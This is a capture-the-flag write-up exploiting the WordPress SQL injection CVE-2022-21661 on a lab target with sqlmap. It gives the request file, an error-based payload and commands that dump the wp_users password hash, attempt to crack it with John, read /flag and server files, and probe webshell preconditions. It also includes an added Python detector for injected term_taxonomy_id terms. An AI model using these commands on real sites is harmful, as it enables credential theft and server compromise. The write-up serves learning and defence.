春秋云境 CVE-2022-21661: sqlmap + JSON in one go
URLs:
https://yunjing.ichunqiu.com/
https://yunjing.ichunqiu.com/cve/detail/1026?pay=2
sqlmap launch arguments:
set cmdpath2024=c:\Python310\python
%cmdpath2024% E:\BaiduNetdiskDownload\sqlmapproject-sqlmap-796173f\sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="23) " --suffix="#" --threads=4 --current-db --is-dba --dbs --proxy=http://127.0.0.1:8080
# sqlmap {1.6.2.4#dev}, supports Python 3.10
# http://127.0.0.1:8080/ is the HTTP proxy started by Burp Suite 2022, to make observation easier.
Contents of ./rr2024.txt:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: eci-2ze8beum9sog31ctu6to.cloudeci1.ichunqiu.com
User-Agent: curl/7.87.0
Accept: */*
Content-Length: 131
Content-Type: application/x-www-form-urlencoded
Connection: close
action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1*"]}}}
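The request above exercises the tax_query handling behind CVE-2022-21661, where a term_taxonomy_id term is used as-is. As an added detection example (not part of the original writeup), the following Python inspects an admin-ajax POST body and flags term_taxonomy_id terms that are not plain integers; both sample bodies are constructed here, the second reusing the payload sqlmap reports later on this page.

```python
import json
import re
from urllib.parse import parse_qs

# Constructed sample bodies (not captured traffic). The first mirrors the request
# file above with sqlmap's '*' marker removed; the second reuses the error-based
# payload that sqlmap reports further down in this writeup.
BENIGN_BODY = 'action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1"]}}}'
INJECTED_BODY = (
    'action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":'
    '["12) AND EXTRACTVALUE(2003,CONCAT(0x5c,0x7176766b71,(SELECT (ELT(2003=2003,1))),0x7176767a71))#"]}}}'
)
INTEGER_RE = re.compile(r"\s*-?\d+\s*")


def iter_clauses(node):
    """Yield every leaf clause of a WP tax_query; clauses may sit under nested 'relation' groups."""
    if isinstance(node, dict):
        if "terms" in node:
            yield node
            return
        node = list(node.values())
    if isinstance(node, list):
        for child in node:
            yield from iter_clauses(child)


def suspicious_terms(body):
    """Return term_taxonomy_id terms that are not plain integers.
    Affected WordPress versions (CVE-2022-21661) put these into an SQL IN (...) list
    without an integer cast, so any non-numeric value here is worth alerting on."""
    fields = parse_qs(body, keep_blank_values=True)  # form-decode; 'data' carries the JSON
    if "data" not in fields:
        return []
    try:
        query = json.loads(fields["data"][0])
    except json.JSONDecodeError:
        return []
    flagged = []
    for clause in iter_clauses(query.get("tax_query") if isinstance(query, dict) else None):
        if clause.get("field") != "term_taxonomy_id":
            continue
        terms = clause["terms"]
        for term in terms if isinstance(terms, list) else [terms]:
            is_int = isinstance(term, int) and not isinstance(term, bool)
            is_digits = isinstance(term, str) and INTEGER_RE.fullmatch(term) is not None
            if not (is_int or is_digits):
                flagged.append(str(term))
    return flagged
```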
# The following command lists the tables of the cms database
%cmdpath2024% sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="23) " --suffix="#" --threads=4 -D cms --tables --proxy=http://127.0.0.1:8080
# The following command lists the columns of the wp_users table in the cms database
%cmdpath2024% sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="2) " --suffix="#" --threads=6 -D cms -T wp_users --columns --proxy=http://127.0.0.1:8080
# The following command dumps selected columns (user_login,user_nicename,user_pass) of the wp_users table in the cms database
%cmdpath2024% sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="2) " --suffix="#" --threads=6 -D cms -T wp_users -C "user_login,user_nicename,user_pass" --dump --proxy=http://127.0.0.1:8080
back-end DBMS: MySQL >= 5.0.0
current database: 'cms'
[23:20:12] [INFO] retrieved: 'root@localhost'
current user is DBA: True
available databases [5]:
[*] cms
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
Database: cms
[12 tables]
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
Database: cms
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| display_name | varchar(250) |
| ID | bigint(20) unsigned |
| user_activation_key | varchar(255) |
| user_email | varchar(100) |
| user_login | varchar(60) |
| user_nicename | varchar(50) |
| user_pass | varchar(255) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
+---------------------+---------------------+
Database: cms
Table: wp_users
[1 entry]
+-----------------+-----------------+------------------------------------+
| user_login | user_nicename | user_pass |
+-----------------+-----------------+------------------------------------+
| adminadminadmin | adminadminadmin | $P$B9CtTsiRiQYVm4/sD0ylD6qBkN1EO.0 |
+-----------------+-----------------+------------------------------------+
john cracking failed:
echo 'adminadminadmin:$P$B9CtTsiRiQYVm4/sD0ylD6qBkN1EO.0'>./hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=phpass ./hashes.txt
get flag:
# The following command reads the flag
%cmdpath2024% sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="2) " --suffix="#" --threads=6 --file-read="/flag" --proxy=http://127.0.0.1:8080
Output:
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 1 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["12) AND EXTRACTVALUE(2003,CONCAT(0x5c,0x7176766b71,(SELECT (ELT(2003=2003,1))),0x7176767a71))#"]}}}
Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
---
[19:52:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[19:52:58] [INFO] fingerprinting the back-end DBMS operating system
[19:53:01] [INFO] the back-end DBMS operating system is Linux
[19:53:01] [DEBUG] going to read the file with a non-stacked query SQL injection technique
[19:53:01] [INFO] fetching file: '/flag'
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
files saved to [1]:
[*] C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2ze420okq7lq6jfkcesm.cloudeci1.ichunqiu.com\files\_flag
flag{d77546af-4520-4cf4-a200-94a365ce05be}
Probing the preconditions for writing a webshell:
%cmdpath2024% sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="2) " --suffix="#" --threads=6 --sql-query "SELECT concat(now(),0x7e,version(),0x7e,@@secure_file_priv,0x7e,@@plugin_dir)" --proxy=http://127.0.0.1:8080
Output:
SELECT concat(now(),0x7e,version(),0x7e,@@secure_file_priv,0x7e,@@plugin_dir): '2024-10-29 12:16:47~5.7.39-0ubuntu0.18.04.2~~/usr/lib/mysql/plugin/'
Reading /etc/hosts (the site/database separation is fake):
# eci-managed hosts file.
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
fe00::0 ip6-mcastprefix
fe00::1 ip6-allnodes
fe00::2 ip6-allrouters
10.9.118.207 engine-2
Reading /etc/my.cnf: the file does not exist
Reading /etc/resolv.conf:
nameserver 100.100.2.136
nameserver 100.100.2.138
/var/www/html/wp-admin/profile.php 283 bytes
/var/www/html/.htaccess 261 bytes
/var/www/html/index.php 26 bytes
/var/www/html/wp-admin/admin-functions.php 406 bytes
/var/www/html/wp-admin/admin-ajax.php 4.83 KB (4,948 bytes)
Probing /var/www/html/wp-admin/admin-ajax.php
[22:28:48] [DEBUG] performed 472 queries in 1455.96 seconds
do you want confirmation that the remote file '/var/www/html/wp-admin/admin-ajax.php' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[22:28:48] [DEBUG] used the default behavior, running in batch mode
[22:28:48] [DEBUG] checking the length of the remote file '/var/www/html/wp-admin/admin-ajax.php'
[22:28:48] [PAYLOAD] 2) AND EXTRACTVALUE(9473,CONCAT(0x5c,0x71766b7a71,(MID((IFNULL(CAST(LENGTH(LOAD_FILE(0x2f7661722f7777772f68746d6c2f77702d61646d696e2f61646d696e2d616a61782e706870)) AS NCHAR),0x20)),1,21)),0x717a626a71))#
[22:28:50] [INFO] retrieved: '4948'
[22:28:50] [DEBUG] performed 1 query in 2.26 seconds
[22:28:50] [INFO] the local file 'C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2zeg97hlr4sfet7ivvj0.cloudeci1.ichunqiu.com\files\_var_www_html_wp-admin_admin-ajax.php' and the remote file '/var/www/html/wp-admin/admin-ajax.php' have the same size (4948 B)
files saved to [1]:
[*] C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2zeg97hlr4sfet7ivvj0.cloudeci1.ichunqiu.com\files\_var_www_html_wp-admin_admin-ajax.php (same file)
Probing /var/www/html/.htaccess
[22:31:50] [DEBUG] performed 25 queries in 71.15 seconds
do you want confirmation that the remote file '/var/www/html/.htaccess' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[22:31:50] [DEBUG] used the default behavior, running in batch mode
[22:31:50] [DEBUG] checking the length of the remote file '/var/www/html/.htaccess'
[22:31:50] [PAYLOAD] 2) AND EXTRACTVALUE(7365,CONCAT(0x5c,0x71766b7a71,(MID((IFNULL(CAST(LENGTH(LOAD_FILE(0x2f7661722f7777772f68746d6c2f2e6874616363657373)) AS NCHAR),0x20)),1,21)),0x717a626a71))#
[22:31:52] [INFO] retrieved: '261'
[22:31:52] [DEBUG] performed 1 query in 2.24 seconds
[22:31:52] [INFO] the local file 'C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2zeg97hlr4sfet7ivvj0.cloudeci1.ichunqiu.com\files\_var_www_html_.htaccess' and the remote file '/var/www/html/.htaccess' have the same size (261 B)
files saved to [1]:
[*] C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2zeg97hlr4sfet7ivvj0.cloudeci1.ichunqiu.com\files\_var_www_html_.htaccess (same file)
Contents of /var/www/html/.htaccess
# BEGIN WordPress
# The directives (lines) between "BEGIN WordPress" and "END WordPress" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
# END WordPress